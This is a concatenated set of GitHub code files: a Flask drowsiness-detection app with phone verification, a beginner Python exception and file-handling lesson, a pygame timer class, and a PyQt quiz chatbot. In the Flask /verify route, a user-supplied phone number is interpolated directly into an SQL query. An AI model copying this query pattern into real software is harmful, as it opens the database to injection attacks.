base64.b64encode(frame.tobytes())\n # b = \"data:image/jpeg;base64,/9j/\" + z.decode(\"utf-8\") \n b = base64.b64encode(buffer)\n b = \"data:image/jpeg;base64,\" + b.decode(\"utf-8\") \n\n asleep = False\n print(f'yawn_pres: {yawn_pred}, eyes_pred: {eyes_pred}')\n if yawn_pred < 0.2 and eyes_pred < 0.5:\n print('asleep')\n asleep = True\n number = session['number']\n # number='9788065553'\n print(f'number: {number}')\n print('going to send warning')\n send_warning(number)\n\n\n response = {\n 'asleep': asleep,\n 'image': b,\n }\n response = json.dumps(response)\n return response\n\n@app.route('/verify', methods=['GET', 'Post'])\ndef verify():\n '''\n takes in the number and the code and either takes them into the logged\n in page if they already have an account or brings them to the create an account\n page\n '''\n if request.method == 'GET':\n x = 1\n # return render_template('verify.html', new=True, pnum=6)\n\n\n print(request.values)\n\n # new = request.values.get('new')\n number = request.values.get('pnum')[2:]\n session['number'] = number\n print('the number is')\n print(number)\n # number = '9788065553'\n print(f'number: {number}')\n code = request.values.get('code')\n print(f'code: {code}')\n\n status = check_verify(number, code)\n\n\n print(f'status: {status}')\n print(f'type: {type(status)}')\n\n if status == 'approved':\n print(f'the number was approved, checking to see if they already exist')\n #check to see if the phone number is already associated with a user account\n with conn.cursor() as cur:\n # number='9788065553'\n # sql = f'''SELECT * FROM USERS WHERE number = '5';'''\n sql = f'''SELECT * FROM USERS WHERE number='{number}';'''\n cur.execute(sql)\n res = cur.fetchall()\n conn.commit()\n print(res)\n if res == []:\n #no use exists, send them to create account page \n print(f'the user does not exist')\n print('rendering register')\n # session['number'] = number #store number as session variable\n # return render_template('register.html')\n return redirect(url_for('register'))\n else:\n print(f'The user exists, res: {res}')\n #there is a user so send them to logged in page\n return redirect(url_for('landing')) \n elif status == 'pending':\n #not approved\n print(status)\n print('not approved')\n return render_template('index.html')\n else:\n print('.') \n\n@app.route('/leaderboard', methods=['GET'])\ndef leaderboard():\n with conn.cursor() as c:\n c.execute(f'SELECT * FROM LEADERBOARD ORDER BY time DESC LIMIT 5;')\n users = c.fetchall()\n conn.commit()\n top5 = {1:{},2:{},3:{},4:{},5:{}}\n i = 1\n for user in users:\n try:\n top5[i] = {'name':user[1],'drives':user[2],'time':user[3]}\n except:\n top5[i] = {'name':'','drives':'','time':''}\n i+=1\n \n one = top5[1]\n two = top5[2]\n three = top5[3]\n four = top5[4]\n five = top5[5]\n return render_template('leaderboard.html',one=one,two=two,three=three,four=four,five=five)\n\n\n # print('is a new user')\n # print(new)\n\n # temp_ret = temp_codes.document(number).get().to_dict()\n # actual_num = temp_ret['number']\n\n # if str(actual_num) == str(code):\n # print('it worked')\n # if new == 'True':\n # # return form\n # return render_template('survey.html', pnum=number)\n # else:\n # print('is not a new user')\n # # return whatever page we show people who already \n # # return render_template('results.html') #will need to give it more 0\n # return get_group(number)\n\n # else:\n # print('actual code')\n # print(actual_num)\n # print('inputed code')\n # print(code)\n # print('wrong code')\n # return render_template('verify.html', new=new, pnum=number)\n\n\ndef verify_phone(num):\n print('calling the verify method')\n num = num[2:]\n import re\n regex = re.compile(r'^(\\+\\d{1,2}\\s?)?1?\\-?\\.?\\s?\\(?\\d{3}\\)?[\\s.-]?\\d{3}[\\s.-]?\\d{4}$')\n return regex.search(str(num))", "repo_name": "PatKuz/BostonHacks22", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 13050, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "yaml.safe_load", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 21, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 36, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 36, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 53, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 53, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 53, "usage_type": "name"}, {"api_name": "flask.request", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.request.values", "line_number": 56, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 56, "usage_type": "name"}, {"api_name": "auth.start_verify", "line_number": 65, "usage_type": "call"}, {"api_name": "send_msg.send_message", "line_number": 119, "usage_type": "call"}, {"api_name": "send_msg.send_message", "line_number": 141, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 146, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 149, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 149, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 159, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 166, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 170, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 170, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 171, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 172, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 177, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 177, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 178, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 178, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 179, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 179, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 180, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 180, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 181, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 181, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 182, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 182, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 183, "usage_type": "name"}, {"api_name": "cv2.FaceDetectorYN.create", "line_number": 192, "usage_type": "call"}, {"api_name": "cv2.FaceDetectorYN", "line_number": 192, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 200, "usage_type": "call"}, {"api_name": "tensorflow.keras.models", "line_number": 200, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 200, "usage_type": "name"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 201, "usage_type": "call"}, {"api_name": "tensorflow.keras.models", "line_number": 201, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 201, "usage_type": "name"}, {"api_name": "flask.request", "line_number": 206, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 217, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 217, "usage_type": "name"}, {"api_name": "numpy.fromstring", "line_number": 219, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 219, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 219, "usage_type": "attribute"}, {"api_name": "cv2.imdecode", "line_number": 220, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 220, "usage_type": "attribute"}, {"api_name": "cv2.flip", "line_number": 221, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 232, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 236, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 236, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 240, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 240, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 242, "usage_type": "call"}, {"api_name": "cv2.imencode", "line_number": 245, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 249, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 257, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 268, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 278, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 278, "usage_type": "name"}, {"api_name": "flask.request.values", "line_number": 283, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 283, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 286, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 286, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 286, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 287, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 292, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 292, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 292, "usage_type": "name"}, {"api_name": "auth.check_verify", "line_number": 295, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 318, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 318, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 322, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 322, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 327, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 351, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 384, "usage_type": "call"}]} +{"seq_id": "16892055259", "text": "import os\nfrom pathlib import Path\n\n\ndef my_function():\n try:\n my_list = [6, 0, 3, 2]\n print(my_list[2])\n print(my_list[0] / my_list[3])\n raise KeyError\n except (IndexError, KeyError) as err:\n print(f\"Check your index! Details: {err.args}\")\n except:\n print(\"Something bad happened\")\n finally:\n print(\"This will be always executed\")\n\n\nmy_function()\n\ntext_file = open(\"file.txt\", \"w\")\ntext_file.write(\"This is a message\\n\")\nprint(text_file.tell())\ntext_file.write(\"This is another message\")\ntext_file.close()\n\nwith open(\"file.txt\", \"r\") as another_text_file:\n another_text_file.seek(9)\n message = another_text_file.read()\n print(message)\n\nprint(another_text_file.closed)\nprint(another_text_file.mode)\n\nos.rename(\"file.txt\", \"new_file.txt\")\ncurrent_path = Path(\"new_file.txt\")\nprint(current_path.exists())\nprint(current_path)\n", "repo_name": "BogdanIancu/PythonForBeginners", "sub_path": "Course10/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 893, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.rename", "line_number": 35, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "5213770139", "text": "import pygame\n\nBLANCO = \"White\"\nNEGRO = \"Black\"\n\nclass Chronometer:\n def __init__(self, tiempo_inicial) -> None:\n self.tiempo_desendente = tiempo_inicial\n self.minutos = 0\n self.fuente = pygame.font.SysFont(\"Forte\", 40)\n self.tiempo_actual = pygame.time.get_ticks()\n self.detenido = False\n self.color = BLANCO\n\n def actualizar(self):\n if self.detenido == False:\n tiempo_transcurrido = pygame.time.get_ticks() - self.tiempo_actual\n if tiempo_transcurrido >= 1000:\n self.tiempo_actual = pygame.time.get_ticks()\n self.tiempo_desendente -= 1 # Resta 1 segundo en lugar de sumar 1\n\n\n def mostrar_tiempo(self, pantalla):\n cronometro = self.fuente.render(f\"0{self.minutos} : {str(self.tiempo_desendente).zfill(2)}\", False, self.color)\n pantalla.blit(cronometro, (870, 6))\n\n def get_tiempo(self)-> int:\n return self.tiempo_desendente\n", "repo_name": "alexisaranda1/alexis_aranda_pygame_2023", "sub_path": "Platform shooter/class_chronometer.py", "file_name": "class_chronometer.py", "file_ext": "py", "file_size_in_byte": 961, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.font.SysFont", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.time.get_ticks", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.time.get_ticks", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.time.get_ticks", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 19, "usage_type": "attribute"}]} +{"seq_id": "830003478", "text": "import random\n\nimport function\nfrom function import *\nimport sys, time\nfrom PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QTextEdit, QPushButton, QLabel, QSizePolicy, QScrollArea\nfrom PyQt5.QtGui import QPixmap, QPalette, QBrush\nfrom PyQt5.QtCore import Qt, QTimer\ni = 0\nanswer = 'azerty'\nclass ChatBot(QWidget):\n def __init__(self):\n super().__init__()\n # self.i = 0\n self.initUI()\n self.connectSignals()\n\n def initUI(self):\n self.setWindowTitle('ChatBot')\n self.setFixedSize(600, 1000)\n\n self.setAutoFillBackground(True)\n palette = self.palette()\n background_image = QPixmap(\"funny.jpg\")\n palette.setBrush(QPalette.Window,\n QBrush(background_image.scaled(self.size(), Qt.IgnoreAspectRatio, Qt.SmoothTransformation)))\n self.setPalette(palette)\n self.setStyleSheet(\"border-radius: 20px;\")\n\n \"\"\"\n # positionne ma fenêtre au coin supérieur gauche\n screen_geometry = QApplication.desktop().availableGeometry()\n self.move(screen_geometry.x(), screen_geometry.y())\n \"\"\"\n\n # positionne ma fenêtre au coin supérieur droit\n screen_geometry = QApplication.desktop().availableGeometry()\n self.move(screen_geometry.width() - self.width(), 0)\n\n self.scroll_area = QScrollArea()\n self.scroll_area.setWidgetResizable(True)\n self.scroll_area.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n\n self.message_widget = QWidget()\n self.message_area = QVBoxLayout(self.message_widget)\n self.message_area.setAlignment(Qt.AlignTop)\n self.message_area.setSpacing(15)\n\n self.scroll_area.setWidget(self.message_widget)\n\n self.scroll_widget = QWidget()\n self.scroll_widget.setStyleSheet(\"background-color: transparent;\")\n self.scroll_layout = QVBoxLayout(self.scroll_widget)\n self.scroll_layout.addWidget(self.scroll_area)\n\n\n # Ajoutez le contenu à la zone de message comme avant.\n self.user_message = QTextEdit()\n self.user_message.setStyleSheet(\n 'background-color: white; border-radius: 10px; font-family: Monotype Corsiva; font-size: 25px; padding-left: 10px')\n self.user_message.setFixedHeight(40)\n self.user_message.setPlaceholderText(\"Tapez votre message...\")\n self.user_message.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n self.user_message.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed)\n\n self.send_button = QPushButton('Okay')\n self.send_button.setStyleSheet(\n 'background-color: #0084ff; font-family: Monotype Corsiva; font-size: 20px; color: white; border-radius: 10px;')\n self.send_button.setFixedHeight(40)\n self.send_button.setFixedWidth(80)\n\n self.bottom_bar = QHBoxLayout()\n self.bottom_bar.addWidget(self.user_message)\n self.bottom_bar.addWidget(self.send_button)\n self.bottom_bar.setSpacing(10)\n self.bottom_bar.setContentsMargins(10, 10, 10, 10)\n self.bottom_bar.setAlignment(Qt.AlignBottom)\n\n self.main_layout = QVBoxLayout(self)\n self.main_layout.addWidget(self.scroll_widget)\n self.main_layout.addLayout(self.bottom_bar)\n self.greet()\n\n def scrollToBottom(self):\n scrollbar = self.scroll_area.verticalScrollBar()\n scrollbar.setValue(scrollbar.maximum())\n\n def greet(self):\n bot_response01 = 'Hello! My name is Apasize. I was created in April 2023.'\n QTimer.singleShot(1000, lambda: self.addMessage(bot_response01, False))\n bot_response02 = 'Please, remind me your name.'\n QTimer.singleShot(2000, lambda: self.addMessage(bot_response02, False))\n\n def remind_name(self, message):\n bot_response = 'What a great name you have, ' + message + '!'\n QTimer.singleShot(1500, lambda: self.addMessage(bot_response, False))\n bot_response01 = 'Let me guess your age.'\n QTimer.singleShot(3000, lambda: self.addMessage(bot_response01, False))\n bot_response02 = 'Enter remainders of dividing your age by 3, 5 and 7.'\n QTimer.singleShot(4000, lambda: self.addMessage(bot_response02, False))\n\n def guess_age_and_enjoy(self, message):\n remainders = message.split(',') # couper en fonction de l'espace la saisie de l'utilisateur\n #print(remainders)\n if(remainders and remainders[0] and remainders[1] and remainders[2]):\n rem3 = int(remainders[0])\n rem5 = int(remainders[1])\n rem7 = int(remainders[2])\n else:\n rem3 = 0\n rem5 = 0\n rem7 = 0\n age = (rem3 * 70 + rem5 * 21 + rem7 * 15) % 105\n\n bot_response = \"You are \" + str(age) + \" years old; that's a good time to start programming!\"\n QTimer.singleShot(1000, lambda: self.addMessage(bot_response, False))\n\n\n\n bot_message = \"Let's test your Projects knowledge.\"\n QTimer.singleShot(2000, lambda: self.addMessage(bot_message, False))\n # write your code here\n quiz = [\"What technologies and tools does the Find_Me project use ?\",\n \"What technologies and tools does the PlantVision use ?\",\n \"What technologies and tools does the StressZero use ?\",\n \"What technologies and tools does the PerfectWriting use ?\",\n \"What technologies and tools does the MyMonotoringCamera use ?\",\n \"What technologies and tools does the Otakumate use ?\",\n \"What technologies and tools does the HomeLinks use ?\"]\n\n response = {\n 'response00': ('Supervised Learning', 'Computer Vision', 'Internet Of Objects', 'Deep Learning', 'All above'),\n 'response01': ('Data Clustering', 'Supervised Learning', 'Computer Vision', 'MyFavoriteHero', 'Deep Learning'),\n 'response02': ('Computer Vision', 'Internet Of Objects', 'Deep Learning', 'Supervised Learning', 'Akaza_Dono'),\n 'response03': ('Supervised Learning', 'To be an otaku', 'Deep Learning', ' Kit ARDUINO', 'Computer Vision'),\n 'response04': ('Deep Learning', 'Supervised Learning', 'Internet Of Objects', 'Computer Vision', 'Eren Jäger'),\n 'response05': ('Python', 'Computer Vision', 'Internet Of Objects', 'Supervised Learning', 'Boobs and imagination'),\n 'response06': ('Internet Of Objects', 'Supervised Learning', 'All above', 'Data Clustering', 'Have a girl friend')\n\n }\n\n answers = {\n 'response00': ['1,3'],\n 'response01': ['2,3,5'],\n 'response02': ['1,3,4'],\n 'response03': ['1,3,5'],\n 'response04': ['1,2,4'],\n 'response05': ['1,4'],\n 'response06': ['3']\n\n }\n\n tmp = random.randint(0, 6)\n resp = str('response0' + str(tmp))\n bot_response01 = quiz[tmp] + '\\n' + '1. ' + response[resp][0] + '\\n' + '2. ' + response[resp][1] + '\\n' + '3. ' + \\\n response[resp][2] + '\\n' + '4. ' + response[resp][3] + '\\n' + '5. ' + response[resp][4]\n QTimer.singleShot(3000, lambda: self.addMessage(bot_response01, False))\n\n\n global answer\n answer = answers[resp][0]\n\n def test(self, message):\n\n if(message == answer):\n bot_message01 = 'Congratulations!!!'\n QTimer.singleShot(1000, lambda: self.addMessage(bot_message01, False))\n bot_message02 = 'Now you have unlocked the level allowing you to use commands to control our IoT tool!'\n QTimer.singleShot(1500, lambda: self.addMessage(bot_message02, False))\n bot_message = 'How can I help you? Enter your command'\n QTimer.singleShot(2000, lambda: self.addMessage(bot_message, False))\n else:\n bot_message01 = 'GAME OVER!!!'\n QTimer.singleShot(1000, lambda: self.addMessage(bot_message01, False))\n bot_message02 = 'You love anime too much! Baaaka!'\n QTimer.singleShot(1500, lambda: self.addMessage(bot_message02, False))\n bot_message03 = \"Don't even try anymore. you can't...\"\n QTimer.singleShot(2000, lambda: self.addMessage(bot_message03, False))\n\n\n\n\n\n def command(self, command):\n # décomposition de la commande\n command_words = command.split(\" \")\n\n # appel de la fonction permettant de trouver clairement ce que l'utilisateur veut\n user_prompt = function.prompt(command_words)\n #print(user_prompt)\n bot_response = 'A few moments...'\n QTimer.singleShot(500, lambda: self.addMessage(bot_response, False))\n send_prompt(user_prompt)\n\n action = user_prompt.split(' ')[0]\n #print(action)\n if action == \"temp\":\n bot_message = 'Your results.\\n'+function.get_message().split('\\n')[0]\n #print(bot_message)\n QTimer.singleShot(1200, lambda: self.addMessage(bot_message, False))\n if action ==\"hum\":\n bot_message = 'Your results.\\n'+function.get_message().split('\\n')[0]\n QTimer.singleShot(1200, lambda: self.addMessage(bot_message, False))\n\n def addMessage(self, message, isUser):\n message_label = QLabel(message)\n message_label.setWordWrap(True)\n\n message_label.setStyleSheet(\n 'background-color: #EDEDED; border-radius: 10px; padding: 5px; font-family: Monotype Corsiva; font-size: 20px;')\n\n if isUser:\n message_layout = QHBoxLayout()\n message_layout.addWidget(QLabel())\n message_layout.addWidget(message_label)\n else:\n message_layout = QHBoxLayout()\n message_layout.addWidget(message_label)\n message_layout.addWidget(QLabel())\n\n message_layout.setContentsMargins(-10, 5, 10, 5)\n\n self.message_area.addLayout(message_layout)\n self.scroll_area.ensureWidgetVisible(self.message_widget)\n\n def execute(self):\n global i, answer\n #print(i)\n #print(self.send_button.isChecked())\n command_list = ['name', 'age', 'test', 'command']\n if command_list[i] == 'name':\n message = self.sendUserMessage()\n self.remind_name(message)\n i += 1\n elif command_list[i] == 'age':\n message = self.sendUserMessage()\n self.guess_age_and_enjoy(message)\n i += 1\n elif command_list[i] == 'test':\n message = self.sendUserMessage()\n self.test(message)\n i += 1\n elif command_list[i] == 'command':\n commande = self.sendUserMessage()\n self.command(commande)\n\n\n def sendUserMessage(self):\n message_text = self.user_message.toPlainText()\n QTimer.singleShot(0, lambda: self.addMessage(message_text, True))\n #print(message_text)\n\n self.user_message.clear()\n\n # Set focus back to the user message QTextEdit\n self.user_message.setFocus()\n return message_text\n\n def connectSignals(self):\n self.setLayout(self.main_layout)\n self.send_button.clicked.connect(self.execute)\n #self.user_message.returnPressed.connect(self.execute)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n chatbot = ChatBot()\n #chatbot.connectSignals()\n chatbot.show()\n sys.exit(app.exec_())\n\n\n\n\"\"\"\n def connectSignals(self):\n self.i += 1\n print(self.send_button.isChecked())\n command_list = ['greet', 'name', 'age', 'test', 'command']\n self.setLayout(self.main_layout)\n if command_list[self.i - 1] == 'greet':\n self.greet()\n print(self.send_button.isChecked())\n\n elif self.send_button.isChecked():\n print(self.send_button.isChecked())\n #if command_list[self.i - 1] == 'name':\n self.sendUserMessage()\n self.remind_name()\n elif command_list[self.i - 1] == 'age':\n if self.send_button.isChecked():\n self.guess_age()\n elif command_list[self.i - 1] == 'test':\n if self.send_button.isChecked():\n self.test()\n elif command_list[self.i - 1] == 'command':\n if self.send_button.isChecked():\n self.command()\n print(self.send_button.isChecked())\n #self.send_button.clicked.connect(self.remind_name)\n \n\"\"\"", "repo_name": "Apasize/My_Pyqt_ChatBot", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 12376, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 11, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 24, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPalette.Window", "line_number": 25, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QPalette", "line_number": 25, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QBrush", "line_number": 26, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.IgnoreAspectRatio", "line_number": 26, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 26, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.SmoothTransformation", "line_number": 26, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QApplication.desktop", "line_number": 37, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 37, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QScrollArea", "line_number": 40, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.ScrollBarAlwaysOff", "line_number": 42, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 42, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 44, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 45, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.AlignTop", "line_number": 46, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 46, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 51, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 53, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTextEdit", "line_number": 58, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.ScrollBarAlwaysOff", "line_number": 63, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 63, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QSizePolicy.Expanding", "line_number": 64, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QSizePolicy", "line_number": 64, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QSizePolicy.Fixed", "line_number": 64, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 66, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 72, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.AlignBottom", "line_number": 77, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 77, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 79, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 90, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 90, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 92, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 92, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 96, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 96, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 98, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 98, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 100, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 100, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 116, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 116, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 121, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 121, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 153, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 157, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 157, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 167, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 167, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 169, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 169, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 171, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 171, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 174, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 174, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 176, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 176, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 178, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 178, "usage_type": "name"}, {"api_name": "function.prompt", "line_number": 189, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 192, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 192, "usage_type": "name"}, {"api_name": "function.get_message", "line_number": 198, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 200, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 200, "usage_type": "name"}, {"api_name": "function.get_message", "line_number": 202, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 203, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 203, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 206, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 213, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 214, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 217, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 219, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 250, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 250, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 266, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 266, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 270, "usage_type": "call"}]} +{"seq_id": "72793968484", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport torch\nfrom scipy.sparse import csr_matrix\nfrom scipy.sparse import diags\nfrom scipy.sparse.linalg import eigsh\n\nfrom sklearn.cluster import 